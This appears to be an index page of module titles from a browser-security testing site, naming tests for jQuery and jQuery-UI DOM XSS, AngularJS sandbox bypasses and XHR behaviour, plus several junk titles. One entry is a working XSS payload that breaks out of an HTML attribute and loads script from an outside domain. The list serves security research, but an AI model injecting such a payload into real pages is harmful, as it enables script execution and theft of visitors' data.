Modules

Location hash (aka. fragment) spills into data URI content testing no-op Geolocation Spoof jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Hooking Storage Objects Number Properties exposed by the Window Object? jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. Can Do Not Track be bypassed using XHR ? HTTP Methods Supported by XHR TestHarness: Using Assertions in DomStorm TestHarness: XMLHttpRequest: setRequestHeader() name argument checks List of properties that doesn't need parenthesis Direct references to Window objects Location unforgeable - Test Harness Can Cookie Setter be Hooked? XSS vectors without user interaction List of all jQuery versions vulnerable to the Selector DOM XSS. (http://ma.la/jquery_xss/) 2132 test test fuzz jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Test XSS for jQuery jQuery-UI XSS via .dialog() method's "closeText" argument jQuery-UI XSS via .dialog() method's "title" argument [CVE-2010-5312] Can Navigator.UserAgent Be Spoofed? Knockout JS libraries vulnerable to data-bind injection List of constructors that refer to window w/o parenthesis Check document.domain jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Geolocation Overriding Check document.domain jQuery UI .dialog() closeText property DOM XSS Sink. Jquery attribute equals selector + location.hash.slice(1) Jquery ID selector + location.hash Jquery class selector + hash.slice(1) Attribute Separators Does Iframe sandbox execute script inside child iframe? s chuang yu dun Test 123 123 "><script src=https://xs90.xss.ht></script> Jquery a[] xss test angry jquery SecurityPolicyViolationEvent jQuery-UI XSS via .dialog() method jQuery Migrate DOM XSS $("#<XSS>") [id selector] AngularJS Sandbox Bypasses extended test for jquery selector xss jQuery Migrate DOM XSS $("a[href='<XSS>']") [Attribute equals selector] Jquery ID selector + location.hash.slice(1) jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Getters & Setters for Element.prototype jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') jQuery Selectors Vulnerable to XSS https://passport.informatica.com/js/jquery.js https://passport.informatica.com/js/jquery.js jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Configurability of Location Properties Testing jQuery 3.1 123 Updated jquery XSS attack jQuery-UI XSS via .dialog() method's "closeText" argument (short version) TestHarness: Allowed Request Headers by XHR chuang yu dun jQuery Migrate DOM XSS $(".<XSS>") [Class selector] test test final sdf jQuery Migrate DOM XSS $(".<XSS>") [Class selector] (new) Valid attribute separators Global event handlers jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. (2) Allowed Request Headers by XHR jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. jquery 1.8.1 Document Setters test Properties of LocalStorage Element Node Setters